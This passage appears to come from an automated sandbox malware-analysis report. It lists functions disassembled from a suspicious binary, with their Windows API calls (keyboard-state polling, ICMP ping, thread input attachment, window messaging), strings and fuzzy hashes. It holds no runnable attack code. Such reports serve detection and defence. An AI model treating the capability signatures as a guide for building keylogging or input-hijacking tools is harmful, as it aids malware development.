                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
                                                  • Instruction ID: 87ec29ebe42face093b9ac5005effe7cd79b9d5fb28ead4b72aa05ff6d93a655
                                                  • Opcode Fuzzy Hash: 906cac1131714dce18f06e9295b29959323d269192b932fd4fb501ae1e7a3759
                                                  • Instruction Fuzzy Hash: B141A434504FCD6EFF31966488043B5BEA17B12344F18805ADBC6975C2DBA99DC8C7A2
                                                  Function 0061055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 006105BC
                                                  • inet_addr.WSOCK32(?), ref: 0061061C
                                                  • gethostbyname.WSOCK32(?), ref: 00610628
                                                  • IcmpCreateFile.IPHLPAPI ref: 00610636
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006106C6
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006106E5
                                                  • IcmpCloseHandle.IPHLPAPI(?), ref: 006107B9
                                                  • WSACleanup.WSOCK32 ref: 006107BF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 6ca875e503cf3ed6070634aaabf0daed9950a25a9a0c78203ad3da2fe6d80f97
                                                  • Instruction ID: ba3392af5ad6bdfec32b18f6cfc839dedacd7fb89ac021f9d35c54c50dc7c93e
                                                  • Opcode Fuzzy Hash: 6ca875e503cf3ed6070634aaabf0daed9950a25a9a0c78203ad3da2fe6d80f97
                                                  • Instruction Fuzzy Hash: 97916E355042019FEB20DF15C589B9ABBE2BF84318F1885A9E4698B7A2C770EDC5CF91
                                                  Function 00618CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharLower
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 707087890-567219261
                                                  • Opcode ID: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
                                                  • Instruction ID: dba00dfe44771a9d4cc2a56e4ac724d89933be89b8828150bb5610006c1428a6
                                                  • Opcode Fuzzy Hash: a04e3551582b92150ff9c8450fc8dccc445a483302e3a2976c5e0fdd56b4bc9a
                                                  • Instruction Fuzzy Hash: 5E517F31A001169ECF24DF68C9508FEB7A6BF65724B284229E826A73C5DB35DD81C790
                                                  Function 0061372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32 ref: 00613774
                                                  • CoUninitialize.OLE32 ref: 0061377F
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0062FB78,?), ref: 006137D9
                                                  • IIDFromString.OLE32(?,?), ref: 0061384C
                                                  • VariantInit.OLEAUT32(?), ref: 006138E4
                                                  • VariantClear.OLEAUT32(?), ref: 00613936
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 636576611-1287834457
                                                  • Opcode ID: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
                                                  • Instruction ID: b38d1736d94a8139f54e3f4acf7b9cf2dcdddfc61bd75556687ab519f6c95eb6
                                                  • Opcode Fuzzy Hash: feda6d608bffae00eea0783d098c0438c2932d199d8c46a7404cf82a66f89f68
                                                  • Instruction Fuzzy Hash: 8361C1702087119FD710DF54C848BAABBEAEF89710F04481DF9869B391D770EE89CB96
                                                  Function 00603388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 006033CF
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 006033F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: LoadString$_wcslen
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 4099089115-3080491070
                                                  • Opcode ID: 5c1e69dd432a7702313b41315f9ee3e75132c49f0c343e92f1b1a1f4cf410c2b
                                                  • Instruction ID: 20774a4b4c6800f2eedfe022ab1218f7dbff74eceeb8455d8d1779a2a0be3668
                                                  • Opcode Fuzzy Hash: 5c1e69dd432a7702313b41315f9ee3e75132c49f0c343e92f1b1a1f4cf410c2b
                                                  • Instruction Fuzzy Hash: 1451DF3184020AAADF15EBE0CD4AEEEBB7AFF44341F204165F505721A2EB352F58CB60
                                                  Function 005FB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 1256254125-769500911
                                                  • Opcode ID: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
                                                  • Instruction ID: b97f1284de9566632b7d68e578f979132996d0d57619c95833c321c6a8f18920
                                                  • Opcode Fuzzy Hash: 7801358eb44b2a17a68786624aaa634ae93d09145266ec877a01eeec47518825
                                                  • Instruction Fuzzy Hash: 4041C732A0102BDADB206F7DCC905BE7FA5BFA4794B244229E621D7284F739CD81C790
                                                  Function 00605393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 006053A0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00605416
                                                  • GetLastError.KERNEL32 ref: 00605420
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 006054A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
                                                  • Instruction ID: b1f8e6ebe62f9633ac0c7aba2677eedb3706fd5d9802527b7ec2808b663cf65c
                                                  • Opcode Fuzzy Hash: 23e92c44d0ae4aebe5822d0932f88dfb79540636f6e3abdb2f1acba8c3dce70e
                                                  • Instruction Fuzzy Hash: 5C316935A406059FCB14DF68C489AEBBBF6EB44315F548069E806CB392DA70DD86CB91
                                                  Function 00623C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMenu.USER32 ref: 00623C79
                                                  • SetMenu.USER32(?,00000000), ref: 00623C88
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00623D10
                                                  • IsMenu.USER32(?), ref: 00623D24
                                                  • CreatePopupMenu.USER32 ref: 00623D2E
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00623D5B
                                                  • DrawMenuBar.USER32 ref: 00623D63
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                  • String ID: 0$F
                                                  • API String ID: 161812096-3044882817
                                                  • Opcode ID: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
                                                  • Instruction ID: 52d7c4b4fbbf414a177ad09834ce5a48c99b3b55454a006cf4646c18bfbfec05
                                                  • Opcode Fuzzy Hash: 6c26e76c86b7220315a2c3c7e7e08bcb5465ba1a1278f9adac23861acc36c5e1
                                                  • Instruction Fuzzy Hash: D9416D75A01A19AFDB24CF64E844AEA7BB6FF49350F140428F946AB360D774EA11CF90
                                                  Function 00623A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00623A9D
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00623AA0
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00623AC7
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00623AEA
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00623B62
                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00623BAC
                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00623BC7
                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00623BE2
                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00623BF6
                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00623C13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow
                                                  • String ID:
                                                  • API String ID: 312131281-0
                                                  • Opcode ID: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
                                                  • Instruction ID: 27e9db9be74c430d057e653bb10c12f5f104abcb6b1b9de19fa9b8e3194d310c
                                                  • Opcode Fuzzy Hash: 21fd85a29714d126aab29f5772512fe87c3bcd4a93f7dbcd242b9730d969ead8
                                                  • Instruction Fuzzy Hash: 96618B75A00628AFDB10DFA8DC81EEE77B9EB09700F144199FA15AB3A1C774AE41DF50
                                                  Function 005FB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 005FB151
                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB165
                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 005FB16C
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB17B
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 005FB18D
                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1A6
                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1B8
                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB1FD
                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB212
                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,005FA1E1,?,00000001), ref: 005FB21D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                  • String ID:
                                                  • API String ID: 2156557900-0
                                                  • Opcode ID: ee9d62d7541ff7da54a295222cfc54a573245ba001cf67a93e1382f98ba257dc
                                                  • Instruction ID: 39c6dadff105d1fd74714877c7e6e038d8415050b75012c81a5e51357f7ea8bf
                                                  • Opcode Fuzzy Hash: ee9d62d7541ff7da54a295222cfc54a573245ba001cf67a93e1382f98ba257dc
                                                  • Instruction Fuzzy Hash: 41316B79500618FFEB209F64DC48FBD7FAAFB61361F105015FA05D6290D7B89A458FA0
                                                  Function 005C2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 005C2C94
                                                    • Part of subcall function 005C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000), ref: 005C29DE
                                                    • Part of subcall function 005C29C8: GetLastError.KERNEL32(00000000,?,005CD7D1,00000000,00000000,00000000,00000000,?,005CD7F8,00000000,00000007,00000000,?,005CDBF5,00000000,00000000), ref: 005C29F0
                                                  • _free.LIBCMT ref: 005C2CA0
                                                  • _free.LIBCMT ref: 005C2CAB
                                                  • _free.LIBCMT ref: 005C2CB6
                                                  • _free.LIBCMT ref: 005C2CC1
                                                  • _free.LIBCMT ref: 005C2CCC
                                                  • _free.LIBCMT ref: 005C2CD7
                                                  • _free.LIBCMT ref: 005C2CE2
                                                  • _free.LIBCMT ref: 005C2CED
                                                  • _free.LIBCMT ref: 005C2CFB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
                                                  • Instruction ID: 4bf37b551da5e27e253514703a7af2146ae63af82a2327a4e22bdee3c4ffded8
                                                  • Opcode Fuzzy Hash: d6ee96bb91fc351e5ade815280c0f1cacf1f32a04251b23dc55e199d638f661e
                                                  • Instruction Fuzzy Hash: 6E11A476100109BFCB02EF94D886EDD3FA5FF45350F4144A9FA489F222DA31EE909B90
                                                  Function 00591410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00591459
                                                  • OleUninitialize.OLE32(?,00000000), ref: 005914F8
                                                  • UnregisterHotKey.USER32(?), ref: 005916DD
                                                  • DestroyWindow.USER32(?), ref: 005D24B9
                                                  • FreeLibrary.KERNEL32(?), ref: 005D251E
                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D254B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 8a6fde31b062fc5eb9a3054ee81bb5fa85202792da8d6f707a208408d8992eb1
                                                  • Instruction ID: c1343b30f7d13e0686e7c869793e6f7579927647edffdd1de9cb4a717ac4576c
                                                  • Opcode Fuzzy Hash: 8a6fde31b062fc5eb9a3054ee81bb5fa85202792da8d6f707a208408d8992eb1
                                                  • Instruction Fuzzy Hash: 71D179306016238FCF29EF18D499A29FBA5BF55310F1442AEE44AAB352CB30ED12CF54
                                                  Function 00595BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00595C7A
                                                    • Part of subcall function 00595D0A: GetClientRect.USER32(?,?), ref: 00595D30
                                                    • Part of subcall function 00595D0A: GetWindowRect.USER32(?,?), ref: 00595D71
                                                    • Part of subcall function 00595D0A: ScreenToClient.USER32(?,?), ref: 00595D99
                                                  • GetDC.USER32 ref: 005D46F5
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 005D4708
                                                  • SelectObject.GDI32(00000000,00000000), ref: 005D4716
                                                  • SelectObject.GDI32(00000000,00000000), ref: 005D472B
                                                  • ReleaseDC.USER32(?,00000000), ref: 005D4733
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005D47C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
                                                  • Instruction ID: f2ad03646fccc23fbf2d6482e93101377396e3178b513d63c762c6f6d0cb80fd
                                                  • Opcode Fuzzy Hash: 3cafa09b524ff85ee6cb83c4eddf28043a924cd81cb2fa1dfac2dbe7f1f71c36
                                                  • Instruction Fuzzy Hash: 4571CC31400605DFCF328F68C984ABA7FB6FF4A361F18426BE9565A2A6D3318C52DF50
                                                  Function 0060359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006035E4
                                                    • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
                                                  • LoadStringW.USER32(00662390,?,00000FFF,?), ref: 0060360A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
